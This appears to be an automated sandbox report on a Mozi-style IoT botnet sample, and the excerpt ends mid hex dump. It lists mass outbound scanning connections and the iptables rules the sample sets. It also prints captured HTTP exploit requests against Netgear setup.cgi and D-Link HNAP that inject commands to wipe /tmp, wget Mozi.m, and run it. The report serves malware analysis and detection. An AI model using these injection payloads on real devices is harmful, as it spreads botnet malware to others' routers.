Source: global traffic	TCP traffic: 192.168.2.20:52536 -> 57.36.162.225:37215
Source: global traffic	TCP traffic: 192.168.2.20:33892 -> 21.235.195.37:52869
Source: global traffic	TCP traffic: 192.168.2.20:48214 -> 49.108.152.99:5555
Source: global traffic	TCP traffic: 192.168.2.20:55560 -> 128.190.19.186:5555
Source: global traffic	TCP traffic: 192.168.2.20:45624 -> 74.219.227.124:81
Source: global traffic	TCP traffic: 192.168.2.20:47868 -> 147.138.192.17:37215
Source: global traffic	TCP traffic: 192.168.2.20:40840 -> 75.189.55.206:52869
Source: global traffic	TCP traffic: 192.168.2.20:55110 -> 50.247.39.46:37215
Source: global traffic	TCP traffic: 192.168.2.20:36608 -> 186.218.134.111:7574
Source: global traffic	TCP traffic: 192.168.2.20:41524 -> 149.212.155.111:49152
Source: global traffic	TCP traffic: 192.168.2.20:40636 -> 2.75.39.125:8080
Source: global traffic	TCP traffic: 192.168.2.20:32982 -> 60.214.246.235:7574
Source: global traffic	TCP traffic: 192.168.2.20:44232 -> 168.218.233.120:8080
Source: global traffic	TCP traffic: 192.168.2.20:45194 -> 76.221.238.163:8443
Source: global traffic	TCP traffic: 192.168.2.20:59288 -> 45.68.141.187:8080
Source: global traffic	TCP traffic: 192.168.2.20:49960 -> 164.202.240.135:7574
Source: global traffic	TCP traffic: 192.168.2.20:43290 -> 218.59.80.132:5555
Source: global traffic	TCP traffic: 192.168.2.20:34398 -> 221.116.41.88:7574
Source: global traffic	TCP traffic: 192.168.2.20:41456 -> 156.173.198.61:7574
Source: global traffic	TCP traffic: 192.168.2.20:35036 -> 210.217.175.171:7574
Source: global traffic	TCP traffic: 192.168.2.20:56112 -> 13.79.188.4:49152
Source: global traffic	TCP traffic: 192.168.2.20:45248 -> 150.142.183.220:37215
Source: global traffic	TCP traffic: 192.168.2.20:56644 -> 141.244.16.122:7574
Source: global traffic	TCP traffic: 192.168.2.20:53118 -> 186.103.97.125:81
Source: global traffic	TCP traffic: 192.168.2.20:35448 -> 103.196.9.119:37215
Source: global traffic	TCP traffic: 192.168.2.20:39864 -> 57.70.195.71:8080
Source: global traffic	TCP traffic: 192.168.2.20:42412 -> 7.127.210.197:8443
Source: global traffic	TCP traffic: 192.168.2.20:45066 -> 140.126.213.100:8080
Source: global traffic	TCP traffic: 192.168.2.20:38624 -> 93.102.154.208:7574
Source: global traffic	TCP traffic: 192.168.2.20:36466 -> 14.209.121.58:5555
Source: global traffic	TCP traffic: 192.168.2.20:50296 -> 198.94.178.173:8080
Source: global traffic	TCP traffic: 192.168.2.20:49110 -> 128.214.130.86:37215
Source: global traffic	TCP traffic: 192.168.2.20:49378 -> 161.95.84.239:49152
Source: global traffic	TCP traffic: 192.168.2.20:59012 -> 180.95.166.6:7574
Source: global traffic	TCP traffic: 192.168.2.20:50268 -> 126.145.155.11:8080
Source: global traffic	TCP traffic: 192.168.2.20:50326 -> 97.214.218.204:8443
Source: global traffic	TCP traffic: 192.168.2.20:57272 -> 201.137.113.90:7574
Source: global traffic	TCP traffic: 192.168.2.20:36312 -> 155.10.81.73:81
Source: global traffic	TCP traffic: 192.168.2.20:44506 -> 72.153.111.43:52869
Source: global traffic	TCP traffic: 192.168.2.20:33122 -> 100.134.89.123:37215
Source: global traffic	TCP traffic: 192.168.2.20:45624 -> 124.1.3.78:81
Source: global traffic	TCP traffic: 192.168.2.20:57720 -> 63.125.68.17:37215
Source: global traffic	TCP traffic: 192.168.2.20:36848 -> 106.214.110.94:8080
Source: global traffic	TCP traffic: 192.168.2.20:41234 -> 196.97.252.233:8080
Source: global traffic	TCP traffic: 192.168.2.20:48156 -> 111.18.246.102:5555
Source: global traffic	TCP traffic: 192.168.2.20:55514 -> 90.175.58.51:8443
Source: global traffic	TCP traffic: 192.168.2.20:49138 -> 139.223.146.63:81
Source: global traffic	TCP traffic: 192.168.2.20:44616 -> 6.47.161.79:52869
Source: global traffic	TCP traffic: 192.168.2.20:53498 -> 19.35.140.38:52869
Source: global traffic	TCP traffic: 192.168.2.20:55680 -> 31.237.51.135:8080
Source: global traffic	TCP traffic: 192.168.2.20:46996 -> 13.131.172.243:8080
Source: global traffic	TCP traffic: 192.168.2.20:51696 -> 150.180.237.213:49152
Source: global traffic	TCP traffic: 192.168.2.20:47798 -> 198.126.3.49:52869
Source: global traffic	TCP traffic: 192.168.2.20:53892 -> 101.243.205.98:8080
Source: global traffic	TCP traffic: 192.168.2.20:60562 -> 71.4.197.241:52869
Source: global traffic	TCP traffic: 192.168.2.20:43640 -> 78.67.181.55:8080
Source: global traffic	TCP traffic: 192.168.2.20:50966 -> 71.22.117.26:37215
Source: global traffic	TCP traffic: 192.168.2.20:45298 -> 210.253.166.196:5555
Source: global traffic	TCP traffic: 192.168.2.20:58316 -> 217.156.45.91:8080
Source: global traffic	TCP traffic: 192.168.2.20:45530 -> 69.131.25.50:8080
Source: global traffic	TCP traffic: 192.168.2.20:46346 -> 167.134.182.74:81
Source: global traffic	TCP traffic: 192.168.2.20:53484 -> 162.85.63.56:49152
Source: global traffic	TCP traffic: 192.168.2.20:57220 -> 40.40.5.248:49152
Source: global traffic	TCP traffic: 192.168.2.20:45068 -> 150.250.137.224:52869
Source: global traffic	TCP traffic: 192.168.2.20:53948 -> 20.194.139.143:37215
Source: global traffic	TCP traffic: 192.168.2.20:50320 -> 201.150.28.32:5555
Source: global traffic	TCP traffic: 192.168.2.20:59572 -> 146.204.28.33:37215
Source: global traffic	TCP traffic: 192.168.2.20:42558 -> 59.163.54.53:81
Source: global traffic	TCP traffic: 192.168.2.20:37544 -> 122.180.52.190:49152
Source: global traffic	TCP traffic: 192.168.2.20:34618 -> 17.77.32.32:8080
Source: global traffic	TCP traffic: 192.168.2.20:36520 -> 111.88.119.30:52869
Source: global traffic	TCP traffic: 192.168.2.20:47824 -> 170.14.175.37:7574
Source: global traffic	TCP traffic: 192.168.2.20:50780 -> 180.81.233.206:8080
Source: global traffic	TCP traffic: 192.168.2.20:55872 -> 202.30.107.204:37215
Source: global traffic	TCP traffic: 192.168.2.20:55682 -> 159.1.131.236:8080
Source: global traffic	TCP traffic: 192.168.2.20:60566 -> 28.46.159.218:37215
Source: global traffic	TCP traffic: 192.168.2.20:46624 -> 16.186.36.13:8443
Source: global traffic	TCP traffic: 192.168.2.20:57220 -> 41.198.51.208:52869
Source: global traffic	TCP traffic: 192.168.2.20:58832 -> 96.208.251.9:37215
Source: global traffic	TCP traffic: 192.168.2.20:47568 -> 175.244.146.57:52869
Source: global traffic	TCP traffic: 192.168.2.20:46752 -> 218.229.107.98:52869
Source: global traffic	TCP traffic: 192.168.2.20:37570 -> 66.131.138.161:52869
Source: global traffic	TCP traffic: 192.168.2.20:35098 -> 182.238.3.204:8080
Source: global traffic	TCP traffic: 192.168.2.20:33190 -> 196.104.68.208:49152
Source: global traffic	TCP traffic: 192.168.2.20:60542 -> 31.54.2.103:8080
Source: global traffic	TCP traffic: 192.168.2.20:38844 -> 71.80.13.69:8443
Source: global traffic	TCP traffic: 192.168.2.20:38518 -> 98.146.234.218:52869
Source: global traffic	TCP traffic: 192.168.2.20:42736 -> 42.158.188.250:8443
Source: global traffic	TCP traffic: 192.168.2.20:46752 -> 52.124.66.249:49152
Source: global traffic	TCP traffic: 192.168.2.20:56666 -> 112.175.198.136:37215
Source: global traffic	TCP traffic: 192.168.2.20:53218 -> 65.97.144.41:7574
Source: global traffic	TCP traffic: 192.168.2.20:42716 -> 27.188.102.35:8443
Source: global traffic	TCP traffic: 192.168.2.20:48224 -> 16.27.248.127:8443
Source: global traffic	TCP traffic: 192.168.2.20:51760 -> 112.225.227.13:8080
Source: global traffic	TCP traffic: 192.168.2.20:44878 -> 22.160.204.61:5555
Source: global traffic	TCP traffic: 192.168.2.20:55630 -> 118.61.155.193:7574
Source: global traffic	TCP traffic: 192.168.2.20:48110 -> 78.17.25.87:37215
Source: global traffic	TCP traffic: 192.168.2.20:38248 -> 77.51.155.51:7574
Source: global traffic	TCP traffic: 192.168.2.20:37170 -> 115.37.92.222:81
Source: global traffic	TCP traffic: 192.168.2.20:38840 -> 131.89.133.126:8080
Source: global traffic	TCP traffic: 192.168.2.20:35668 -> 27.65.122.200:8080
Source: global traffic	TCP traffic: 192.168.2.20:37244 -> 86.219.35.70:8080
Source: global traffic	TCP traffic: 192.168.2.20:53402 -> 67.54.192.184:52869
Source: global traffic	TCP traffic: 192.168.2.20:33678 -> 180.4.220.82:7574
Source: global traffic	TCP traffic: 192.168.2.20:57596 -> 181.38.107.98:52869
Source: global traffic	TCP traffic: 192.168.2.20:53784 -> 44.81.27.36:8080
Source: global traffic	TCP traffic: 192.168.2.20:36966 -> 216.53.201.70:81
Source: global traffic	TCP traffic: 192.168.2.20:56388 -> 29.112.105.90:8080
Source: global traffic	TCP traffic: 192.168.2.20:48784 -> 82.161.10.44:7574
Source: global traffic	TCP traffic: 192.168.2.20:59670 -> 43.171.112.102:8080
Source: global traffic	TCP traffic: 192.168.2.20:34628 -> 162.220.154.103:81
Source: global traffic	TCP traffic: 192.168.2.20:51800 -> 149.233.217.118:37215
Source: global traffic	TCP traffic: 192.168.2.20:34092 -> 68.239.197.132:52869
Source: global traffic	TCP traffic: 192.168.2.20:45598 -> 90.236.155.169:81
Source: global traffic	TCP traffic: 192.168.2.20:54242 -> 147.201.218.189:7574
Source: global traffic	TCP traffic: 192.168.2.20:40092 -> 94.226.21.238:8443
Source: global traffic	TCP traffic: 192.168.2.20:58348 -> 168.250.138.140:5555
Source: global traffic	TCP traffic: 192.168.2.20:55030 -> 44.220.245.95:49152
Source: global traffic	TCP traffic: 192.168.2.20:47720 -> 29.14.27.225:37215
Source: global traffic	TCP traffic: 192.168.2.20:59538 -> 7.241.80.214:8443
Source: global traffic	TCP traffic: 192.168.2.20:43634 -> 34.225.150.107:8080
Source: global traffic	TCP traffic: 192.168.2.20:52194 -> 47.231.216.70:81
Source: global traffic	TCP traffic: 192.168.2.20:37442 -> 212.143.253.107:81
Source: global traffic	TCP traffic: 192.168.2.20:59358 -> 65.216.155.23:7574
Source: global traffic	TCP traffic: 192.168.2.20:56466 -> 118.131.81.154:8080
Source: global traffic	TCP traffic: 192.168.2.20:34080 -> 44.47.238.225:5555
Source: global traffic	TCP traffic: 192.168.2.20:39798 -> 218.248.249.73:5555
Source: global traffic	TCP traffic: 192.168.2.20:52340 -> 140.14.155.136:8080
Source: global traffic	TCP traffic: 192.168.2.20:46540 -> 178.94.151.209:8080
Source: global traffic	TCP traffic: 192.168.2.20:37480 -> 117.126.78.88:49152
Source: global traffic	TCP traffic: 192.168.2.20:43706 -> 39.26.183.64:7574
Source: global traffic	TCP traffic: 192.168.2.20:53336 -> 199.200.239.167:81
Source: global traffic	TCP traffic: 192.168.2.20:44878 -> 218.114.207.215:8080
Source: global traffic	TCP traffic: 192.168.2.20:37346 -> 107.123.183.3:7574
Source: global traffic	TCP traffic: 192.168.2.20:48882 -> 144.29.181.242:8443
Source: global traffic	TCP traffic: 192.168.2.20:48990 -> 32.69.49.22:8443
Source: global traffic	TCP traffic: 192.168.2.20:47446 -> 21.72.133.117:37215
Source: global traffic	TCP traffic: 192.168.2.20:42486 -> 59.252.33.99:52869
Source: global traffic	TCP traffic: 192.168.2.20:45654 -> 125.37.230.230:81
Source: global traffic	TCP traffic: 192.168.2.20:40820 -> 9.136.5.78:8080
Source: global traffic	TCP traffic: 192.168.2.20:42848 -> 30.229.23.209:49152
Source: global traffic	TCP traffic: 192.168.2.20:59242 -> 118.42.153.75:8080
Source: global traffic	TCP traffic: 192.168.2.20:58400 -> 163.23.143.240:5555
Source: global traffic	TCP traffic: 192.168.2.20:40834 -> 167.166.165.188:37215
Source: global traffic	TCP traffic: 192.168.2.20:54230 -> 170.170.215.3:81
Source: global traffic	TCP traffic: 192.168.2.20:41266 -> 120.70.220.231:49152
Source: global traffic	TCP traffic: 192.168.2.20:34204 -> 214.79.226.46:37215
Source: global traffic	TCP traffic: 192.168.2.20:59804 -> 83.105.227.81:52869
Source: global traffic	TCP traffic: 192.168.2.20:33210 -> 162.49.133.246:7574
Source: global traffic	TCP traffic: 192.168.2.20:47520 -> 48.107.62.30:52869
Source: global traffic	TCP traffic: 192.168.2.20:36042 -> 114.62.254.241:8080
Source: global traffic	TCP traffic: 192.168.2.20:38364 -> 29.187.230.13:37215
Source: global traffic	TCP traffic: 192.168.2.20:58634 -> 118.79.117.161:81
Source: global traffic	TCP traffic: 192.168.2.20:57594 -> 195.13.205.115:8080
Source: global traffic	TCP traffic: 192.168.2.20:54600 -> 58.64.250.170:8080
Source: global traffic	TCP traffic: 192.168.2.20:33484 -> 12.220.93.41:5555
Source: global traffic	TCP traffic: 192.168.2.20:36848 -> 71.27.191.205:37215
Source: global traffic	TCP traffic: 192.168.2.20:34424 -> 81.113.147.127:37215
Source: global traffic	TCP traffic: 192.168.2.20:48794 -> 101.144.254.54:8080
Source: global traffic	TCP traffic: 192.168.2.20:59766 -> 23.252.142.180:81
Source: global traffic	TCP traffic: 192.168.2.20:51454 -> 38.207.59.113:81
Source: global traffic	TCP traffic: 192.168.2.20:59246 -> 199.61.86.162:8080
Source: global traffic	TCP traffic: 192.168.2.20:48758 -> 15.247.121.248:7574
Source: global traffic	TCP traffic: 192.168.2.20:58824 -> 200.6.50.57:5555
Source: global traffic	TCP traffic: 192.168.2.20:38174 -> 121.11.201.253:8080
Source: global traffic	TCP traffic: 192.168.2.20:37392 -> 91.86.146.147:8080
Source: global traffic	TCP traffic: 192.168.2.20:58020 -> 86.140.199.244:8443
Source: global traffic	TCP traffic: 192.168.2.20:39284 -> 78.48.124.219:8080
Source: global traffic	TCP traffic: 192.168.2.20:43306 -> 204.174.36.179:8080
Source: global traffic	TCP traffic: 192.168.2.20:48968 -> 220.60.40.28:5555
Source: global traffic	TCP traffic: 192.168.2.20:45016 -> 86.62.181.10:8443
Source: global traffic	TCP traffic: 192.168.2.20:33718 -> 9.120.128.78:49152
Source: global traffic	TCP traffic: 192.168.2.20:50034 -> 55.131.55.4:5555
Source: global traffic	TCP traffic: 192.168.2.20:53096 -> 7.38.178.102:8080
Source: global traffic	TCP traffic: 192.168.2.20:39842 -> 51.37.81.128:8080
Source: global traffic	TCP traffic: 192.168.2.20:54390 -> 12.56.91.65:49152
Source: global traffic	TCP traffic: 192.168.2.20:41300 -> 64.241.138.149:49152
Source: global traffic	TCP traffic: 192.168.2.20:49826 -> 94.91.145.21:52869
Source: global traffic	TCP traffic: 192.168.2.20:56970 -> 139.183.125.68:8443
Source: global traffic	TCP traffic: 192.168.2.20:59406 -> 89.60.86.142:8080
Source: global traffic	TCP traffic: 192.168.2.20:54672 -> 60.66.131.171:7574
Source: global traffic	TCP traffic: 192.168.2.20:40870 -> 7.10.180.85:8443
Source: global traffic	TCP traffic: 192.168.2.20:40088 -> 12.129.41.73:37215
Source: global traffic	TCP traffic: 192.168.2.20:49544 -> 20.117.119.104:37215
Source: global traffic	TCP traffic: 192.168.2.20:36376 -> 76.121.218.200:8080
Source: global traffic	TCP traffic: 192.168.2.20:51938 -> 165.81.251.123:8080
Source: global traffic	TCP traffic: 192.168.2.20:39102 -> 64.153.76.145:52869
Source: global traffic	TCP traffic: 192.168.2.20:35942 -> 171.149.119.244:81
Source: global traffic	TCP traffic: 192.168.2.20:39162 -> 162.164.194.99:8080
Source: global traffic	TCP traffic: 192.168.2.20:59720 -> 130.80.222.213:8080
Source: global traffic	TCP traffic: 192.168.2.20:45416 -> 159.137.4.249:37215
Source: global traffic	TCP traffic: 192.168.2.20:50502 -> 1.210.36.98:49152
Source: global traffic	TCP traffic: 192.168.2.20:56038 -> 123.80.15.43:81
Source: global traffic	TCP traffic: 192.168.2.20:58790 -> 68.191.93.33:8080

Executes the "iptables" command used for managing IP filtering and manipulation

Source: /bin/sh (PID: 4613)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4662)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4675)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4710)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4714)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4732)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4763)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4787)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4860)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4878)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4897)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4909)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4940)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4959)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4994)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5012)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5028)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5050)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5062)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5091)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5100)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5124)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5140)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5164)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5183)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5189)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5220)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5240)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5243)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5249)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5282)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5315)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28537 -j ACCEPT			Jump to behavior

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 71.41.225.74:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 92.246.94.253:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 81.6.188.111:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 